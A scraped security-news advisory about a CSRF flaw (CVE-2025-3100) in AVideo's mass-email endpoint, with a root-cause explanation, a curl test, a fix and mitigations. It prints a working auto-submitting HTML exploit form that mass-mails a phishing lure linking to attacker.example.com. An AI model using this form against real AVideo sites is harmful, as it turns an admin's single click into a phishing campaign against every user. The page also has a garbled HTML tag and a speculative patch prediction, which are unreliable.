AVideo, CSRF, CVE-2025-3100 (Critical)

Listen to this Post

How the Mentioned CVE Works

The vulnerability exists in /objects/emailAllUsers.json.php, an endpoint intended for administrators to send mass emails. The endpoint verifies the user is an admin at line 10 but lacks any Cross-Site Request Forgery (CSRF) token validation. Because AVideo configures session cookies with SameSite=None, a cross-origin POST request automatically includes the admin’s session cookie. An attacker can host a malicious HTML form that submits to this endpoint. When an authenticated admin visits the attacker’s page, the form submits automatically, sending an email to all registered users. The email body, taken directly from `$_POST[‘message’]` at line 41, is rendered as HTML via `$mail->msgHTML()` at line 48. Since the `email` parameter can be omitted, the system defaults to User::getAllUsers(), requiring no prior knowledge of email addresses. The emails are sent through the platform’s configured SMTP server, appearing legitimate and passing SPF/DKIM checks. The endpoint does not call `save()` on any ORM object, bypassing the Referer/Origin validation that would normally occur in ObjectYPT::save(). This leaves the endpoint completely unprotected against CSRF attacks, allowing a single click from an admin to trigger a mass phishing campaign.

DailyCVE Form:

Platform: AVideo Platform
Version: Unspecified versions
Vulnerability: CSRF Mass Email
Severity: Critical
Date: 2025-04-01

Prediction: Patch due 2025-05-01

What Undercode Say:

Analytics indicate a high likelihood of exploitation due to the ease of execution and the high-impact outcome. The admin session cookie’s `SameSite=None` attribute combined with the missing CSRF token creates a trivial attack vector. The lack of `save()` invocation means standard AVideo protections are bypassed entirely.

Bash command to test for the vulnerability using an admin session cookie
curl -b "PHPSESSID=ADMIN_SESSION_COOKIE" \
-X POST "https://your-avideo-instance.com/objects/emailAllUsers.json.php" \
-d "subject=Test&message=

<h1>PoC</h1>

This email was sent to all users.</p>"

Exploit:

The exploit is a simple HTML form hosted on an attacker-controlled domain. When an authenticated admin visits the page, the JavaScript automatically submits the form to the vulnerable endpoint.

<!DOCTYPE html>
<html>
<head><>Exploit</></head>
<body>

<form id="massmail" method="POST" action="https://your-avideo-instance.com/objects/emailAllUsers.json.php">
<input type="hidden" name="subject" value="Important: Verify Your Account" />
<textarea name="message" style="display:none">
<h2>Account Verification Required</h2>
Click <a href="https://attacker.example.com/phish">here</a> to verify.
</textarea>
</form>

<p><script>document.getElementById('massmail').submit();</script>
</body>
</html>

Protection from this CVE

Apply the recommended fix by adding CSRF token validation in the endpoint. Implement the `isGlobalTokenValid()` check immediately after the admin verification.

// objects/emailAllUsers.json.php:13
if (!isGlobalTokenValid()) {
forbiddenPage('Invalid CSRF token');
exit;
}

If patching is not immediately possible, restrict network access to the `/objects/` directory to trusted IPs or disable the mass email functionality.

Impact

An attacker can send convincing, authenticated phishing emails to every user on the platform. This facilitates credential harvesting, malware distribution, and significant reputational damage. The attack requires only a single click from an authenticated administrator and no prior knowledge of user email addresses.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top